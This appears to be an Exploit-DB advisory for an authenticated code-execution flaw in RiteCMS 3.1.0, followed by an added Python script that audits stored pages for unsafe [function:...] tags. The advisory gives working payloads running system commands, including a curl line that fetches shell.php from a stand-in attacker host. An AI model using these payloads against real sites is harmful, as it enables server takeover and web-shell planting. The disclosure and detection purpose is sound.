[webapps] RiteCMS 3.1.0 - Authenticated Remote Code Execution
Exploit DB
Archived Apr 06, 2026
EDB-ID: 52488
CVE: N/A
Author: RED
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-04-06
# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution
# Date: 2025-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/handylulu/RiteCMS
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: 3.1.0
# Tested on: Windows XP
## Vulnerability Description
RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE)
vulnerability via its content_function() handler: [function:...] tags in
page content are evaluated, allowing a user with page-editing privileges
to execute arbitrary PHP on the server.
## Exploit Code
Create or edit any page with the following content:
[function:system('whoami')]
## Steps to Reproduce
1. Log in as administrator
2. Create new page or edit existing page
3. Insert [function:system('whoami')] in content
4. Save and view page
5. Command output will be displayed
## Additional Payloads
[function:system('curl http://attacker/shell.php -o shell.php')]
[function:system('id')]
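
## Auditing Stored Page Content (added example)

Because the [function:...] tags described above are evaluated when a page is rendered, stored page content can be audited for tags that call anything outside a site's known-good set. The following is an added example, not code from the advisory or from RiteCMS. The allowlist names, the page-id-to-content dictionary and the sample pages are constructed assumptions, and the tag pattern approximates the syntax shown on this page rather than RiteCMS's own parser.

```python
import re

# Assumption: tag names this site legitimately uses (hypothetical; set per site).
ALLOWED_FUNCTIONS = frozenset({"show_gallery", "contact_form"})

# Approximation of the tag syntax shown in the advisory, not RiteCMS's parser.
TAG_RE = re.compile(r"\[function:(.*?)\]", re.IGNORECASE | re.DOTALL)
CALL_RE = re.compile(r"\s*([A-Za-z_]\w*)\s*(?:\((.*)\))?\s*;?\s*", re.DOTALL)

# Constructed sample: page id -> stored content, e.g. exported from the CMS database.
SAMPLE_PAGES = {
    "home": "<p>Welcome</p>[function:contact_form]",
    "gallery": "<h1>Photos</h1>[function:show_gallery(3)]",
    "about": "<p>About us</p>[function:system('whoami')]",
    "news": "[FUNCTION:show_gallery(system('id'))]",
}


def classify(body):
    """Return a reason string if the tag body is suspicious, else None."""
    match = CALL_RE.fullmatch(body)
    if not match:
        return "not a plain function call"
    name, args = match.group(1), match.group(2) or ""
    # PHP function names are case-insensitive, so compare in lower case.
    if name.lower() not in ALLOWED_FUNCTIONS:
        return f"function '{name}' not on allowlist"
    # Nested calls, variables, backticks or statement separators in arguments.
    if re.search(r"[()$`;\\]", args):
        return "allowlisted name with non-literal arguments"
    return None


def audit_pages(pages):
    """Return (page_id, tag, reason) for every suspicious tag found."""
    findings = []
    for page_id, content in pages.items():
        for tag in TAG_RE.finditer(content):
            reason = classify(tag.group(1))
            if reason:
                findings.append((page_id, tag.group(0), reason))
    return findings


if __name__ == "__main__":
    for page_id, tag, reason in audit_pages(SAMPLE_PAGES):
        print(f"{page_id}: {tag} -> {reason}")
```

A finding on a page that nobody remembers editing is also a lead for reviewing which accounts hold page-editing privileges.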